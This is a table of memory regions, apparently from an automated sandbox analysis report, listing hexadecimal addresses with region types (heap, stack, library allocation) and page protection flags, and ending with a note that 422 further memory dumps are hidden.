|
18D93E9E000
|
heap
|
page read and write
|
||
|
18D93EA0000
|
heap
|
page read and write
|
||
|
1B57E79000
|
stack
|
page read and write
|
||
|
18D93EC3000
|
heap
|
page read and write
|
||
|
24F34B35000
|
trusted library allocation
|
page read and write
|
||
|
12C3A118000
|
trusted library allocation
|
page read and write
|
||
|
B76CD13000
|
stack
|
page read and write
|
||
|
1B58178000
|
stack
|
page read and write
|
||
|
24F4CFAC000
|
heap
|
page read and write
|
||
|
18D93EA2000
|
heap
|
page read and write
|
||
|
18D95B26000
|
heap
|
page read and write
|
||
|
12C3A364000
|
trusted library allocation
|
page read and write
|
||
|
12C507C2000
|
heap
|
page read and write
|
||
|
12C3914C000
|
trusted library allocation
|
page read and write
|
||
|
18D93E90000
|
heap
|
page read and write
|
||
|
5C370FE000
|
stack
|
page read and write
|
||
|
7FF886BDC000
|
trusted library allocation
|
page execute and read and write
|
||
|
18D93E5F000
|
heap
|
page read and write
|
||
|
18D93E86000
|
heap
|
page read and write
|
||
|
12C388ED000
|
trusted library allocation
|
page read and write
|
||
|
18D93EA3000
|
heap
|
page read and write
|
||
|
7FF886D50000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D20000
|
trusted library allocation
|
page read and write
|
||
|
B76D27E000
|
stack
|
page read and write
|
||
|
12C39A09000
|
trusted library allocation
|
page read and write
|
||
|
7FF886CDA000
|
trusted library allocation
|
page read and write
|
||
|
18D93EC3000
|
heap
|
page read and write
|
||
|
12C38161000
|
trusted library allocation
|
page read and write
|
||
|
12C392A5000
|
trusted library allocation
|
page read and write
|
||
|
12C50771000
|
heap
|
page read and write
|
||
|
12C48179000
|
trusted library allocation
|
page read and write
|
||
|
18D95B13000
|
heap
|
page read and write
|
||
|
24F3302C000
|
heap
|
page read and write
|
||
|
24F32FE3000
|
heap
|
page read and write
|
||
|
12C38010000
|
heap
|
page read and write
|
||
|
24F34F51000
|
trusted library allocation
|
page read and write
|
||
|
7FF886FE4000
|
trusted library allocation
|
page read and write
|
||
|
7FF886CC1000
|
trusted library allocation
|
page read and write
|
||
|
12C39D96000
|
trusted library allocation
|
page read and write
|
||
|
18D93EB4000
|
heap
|
page read and write
|
||
|
24F34BB0000
|
trusted library allocation
|
page read and write
|
||
|
18D93E28000
|
heap
|
page read and write
|
||
|
24F3501F000
|
trusted library allocation
|
page read and write
|
||
|
1B58079000
|
stack
|
page read and write
|
||
|
7FF886B24000
|
trusted library allocation
|
page read and write
|
||
|
18D93ECF000
|
heap
|
page read and write
|
||
|
12C48177000
|
trusted library allocation
|
page read and write
|
||
|
12C5083F000
|
heap
|
page read and write
|
||
|
7FF886D20000
|
trusted library allocation
|
page read and write
|
||
|
24F3309A000
|
heap
|
page read and write
|
||
|
7FF886E40000
|
trusted library allocation
|
page read and write
|
||
|
12C364B2000
|
heap
|
page read and write
|
||
|
18D93D60000
|
heap
|
page read and write
|
||
|
12C506A8000
|
heap
|
page read and write
|
||
|
24F34C47000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DE0000
|
trusted library allocation
|
page read and write
|
||
|
24F33190000
|
heap
|
page read and write
|
||
|
5C36EFD000
|
stack
|
page read and write
|
||
|
18D95B35000
|
heap
|
page read and write
|
||
|
12C38B32000
|
trusted library allocation
|
page read and write
|
||
|
12C504B1000
|
heap
|
page read and write
|
||
|
B76D7FB000
|
stack
|
page read and write
|
||
|
12C50701000
|
heap
|
page read and write
|
||
|
18D93EA9000
|
heap
|
page read and write
|
||
|
12C50802000
|
heap
|
page read and write
|
||
|
24F4D1A0000
|
heap
|
page read and write
|
||
|
12C48161000
|
trusted library allocation
|
page read and write
|
||
|
24F4D1F9000
|
heap
|
page read and write
|
||
|
1B57C73000
|
stack
|
page read and write
|
||
|
24F32E10000
|
heap
|
page read and write
|
||
|
12C36775000
|
heap
|
page read and write
|
||
|
24F34EEF000
|
trusted library allocation
|
page read and write
|
||
|
B76CD9E000
|
stack
|
page read and write
|
||
|
12C36630000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D10000
|
trusted library allocation
|
page execute and read and write
|
||
|
12C3857A000
|
trusted library allocation
|
page read and write
|
||
|
24F34F1B000
|
trusted library allocation
|
page read and write
|
||
|
7FF886BD0000
|
trusted library allocation
|
page read and write
|
||
|
12C38388000
|
trusted library allocation
|
page read and write
|
||
|
12C385D1000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DD0000
|
trusted library allocation
|
page read and write
|
||
|
12C5071E000
|
heap
|
page read and write
|
||
|
24F4CF6E000
|
heap
|
page read and write
|
||
|
18D93E86000
|
heap
|
page read and write
|
||
|
7FF886F60000
|
trusted library allocation
|
page read and write
|
||
|
18D93DAD000
|
heap
|
page read and write
|
||
|
18D93E8D000
|
heap
|
page read and write
|
||
|
18D95B1E000
|
heap
|
page read and write
|
||
|
B76D477000
|
stack
|
page read and write
|
||
|
7FF886CF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886D80000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E30000
|
trusted library allocation
|
page read and write
|
||
|
12C3A33C000
|
trusted library allocation
|
page read and write
|
||
|
12C4845C000
|
trusted library allocation
|
page read and write
|
||
|
18D95B10000
|
heap
|
page read and write
|
||
|
24F34B7C000
|
trusted library allocation
|
page read and write
|
||
|
7FF886BCC000
|
trusted library allocation
|
page execute and read and write
|
||
|
24F34B11000
|
trusted library allocation
|
page read and write
|
||
|
18D93DA9000
|
heap
|
page read and write
|
||
|
12C36466000
|
heap
|
page read and write
|
||
|
7FF886F90000
|
trusted library allocation
|
page execute and read and write
|
||
|
B76CDDE000
|
stack
|
page read and write
|
||
|
7FF886CB0000
|
trusted library allocation
|
page read and write
|
||
|
12C504A0000
|
heap
|
page read and write
|
||
|
7FF886CCA000
|
trusted library allocation
|
page read and write
|
||
|
18D93EA6000
|
heap
|
page read and write
|
||
|
12C3894D000
|
trusted library allocation
|
page read and write
|
||
|
B76D3F8000
|
stack
|
page read and write
|
||
|
7FF886B2C000
|
trusted library allocation
|
page read and write
|
||
|
12C363A0000
|
heap
|
page read and write
|
||
|
7FF886CC0000
|
trusted library allocation
|
page read and write
|
||
|
12C50544000
|
heap
|
page read and write
|
||
|
18D95B26000
|
heap
|
page read and write
|
||
|
7FF886DC0000
|
trusted library allocation
|
page read and write
|
||
|
1B5847B000
|
stack
|
page read and write
|
||
|
24F34A50000
|
heap
|
page execute and read and write
|
||
|
7FF886D90000
|
trusted library allocation
|
page read and write
|
||
|
12C36640000
|
heap
|
page readonly
|
||
|
7FF886B40000
|
trusted library allocation
|
page read and write
|
||
|
7FF886FC0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886EDC000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E00000
|
trusted library allocation
|
page read and write
|
||
|
12C3A2A7000
|
trusted library allocation
|
page read and write
|
||
|
7FF886EE0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E90000
|
trusted library allocation
|
page read and write
|
||
|
12C3855A000
|
trusted library allocation
|
page read and write
|
||
|
1B57DFE000
|
stack
|
page read and write
|
||
|
24F4CF60000
|
heap
|
page read and write
|
||
|
18D93E93000
|
heap
|
page read and write
|
||
|
24F34C86000
|
trusted library allocation
|
page read and write
|
||
|
7FF886BC6000
|
trusted library allocation
|
page read and write
|
||
|
12C50721000
|
heap
|
page read and write
|
||
|
12C506E3000
|
heap
|
page read and write
|
||
|
7FF886BE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
12C3649E000
|
heap
|
page read and write
|
||
|
12C389FA000
|
trusted library allocation
|
page read and write
|
||
|
7FF886B12000
|
trusted library allocation
|
page read and write
|
||
|
18D93EB2000
|
heap
|
page read and write
|
||
|
12C364DE000
|
heap
|
page read and write
|
||
|
7FF886B30000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D60000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DE0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D40000
|
trusted library allocation
|
page read and write
|
||
|
7FF886BD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
18D93F08000
|
heap
|
page read and write
|
||
|
12C504F6000
|
heap
|
page read and write
|
||
|
7FF886B20000
|
trusted library allocation
|
page read and write
|
||
|
24F35053000
|
trusted library allocation
|
page read and write
|
||
|
12C38542000
|
trusted library allocation
|
page read and write
|
||
|
18D93E9F000
|
heap
|
page read and write
|
||
|
B76D3FE000
|
stack
|
page read and write
|
||
|
7FF886CB2000
|
trusted library allocation
|
page read and write
|
||
|
24F4D02F000
|
heap
|
page read and write
|
||
|
7FF886D02000
|
trusted library allocation
|
page read and write
|
||
|
12C505C0000
|
heap
|
page read and write
|
||
|
7FF886B23000
|
trusted library allocation
|
page execute and read and write
|
||
|
12C36650000
|
trusted library allocation
|
page read and write
|
||
|
18D95B35000
|
heap
|
page read and write
|
||
|
18D93E8A000
|
heap
|
page read and write
|
||
|
24F44B20000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E50000
|
trusted library allocation
|
page read and write
|
||
|
18D95B26000
|
heap
|
page read and write
|
||
|
24F34B00000
|
heap
|
page read and write
|
||
|
7FF886C40000
|
trusted library allocation
|
page execute and read and write
|
||
|
24F34BAE000
|
trusted library allocation
|
page read and write
|
||
|
12C3A3B3000
|
trusted library allocation
|
page read and write
|
||
|
12C50825000
|
heap
|
page read and write
|
||
|
18D93E89000
|
heap
|
page read and write
|
||
|
24F34C39000
|
trusted library allocation
|
page read and write
|
||
|
7FF886F8C000
|
trusted library allocation
|
page read and write
|
||
|
7FF886CE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
18D93E48000
|
heap
|
page read and write
|
||
|
12C39E1E000
|
trusted library allocation
|
page read and write
|
||
|
7FF886EA0000
|
trusted library allocation
|
page read and write
|
||
|
B76D57A000
|
stack
|
page read and write
|
||
|
7FF886B2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
12C50859000
|
heap
|
page read and write
|
||
|
7FF886D70000
|
trusted library allocation
|
page read and write
|
||
|
7FF886B3B000
|
trusted library allocation
|
page read and write
|
||
|
5C3653A000
|
stack
|
page read and write
|
||
|
24F33032000
|
heap
|
page read and write
|
||
|
24F330D0000
|
trusted library allocation
|
page read and write
|
||
|
18D957C0000
|
heap
|
page read and write
|
||
|
24F32F90000
|
trusted library allocation
|
page read and write
|
||
|
1B57EFF000
|
stack
|
page read and write
|
||
|
18D93EAE000
|
heap
|
page read and write
|
||
|
12C36494000
|
heap
|
page read and write
|
||
|
1B57F7E000
|
stack
|
page read and write
|
||
|
24F33195000
|
heap
|
page read and write
|
||
|
1B581FB000
|
stack
|
page read and write
|
||
|
B76D37E000
|
stack
|
page read and write
|
||
|
12C50849000
|
heap
|
page read and write
|
||
|
7DF4D0FF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
12C36390000
|
heap
|
page read and write
|
||
|
24F34A90000
|
heap
|
page read and write
|
||
|
18D93ED1000
|
heap
|
page read and write
|
||
|
1B57CFE000
|
stack
|
page read and write
|
||
|
18D95B1B000
|
heap
|
page read and write
|
||
|
24F32FA0000
|
heap
|
page read and write
|
||
|
7DF4DF630000
|
trusted library allocation
|
page execute and read and write
|
||
|
24F44B82000
|
trusted library allocation
|
page read and write
|
||
|
12C3907E000
|
trusted library allocation
|
page read and write
|
There are 422 hidden memdumps, click here to show them.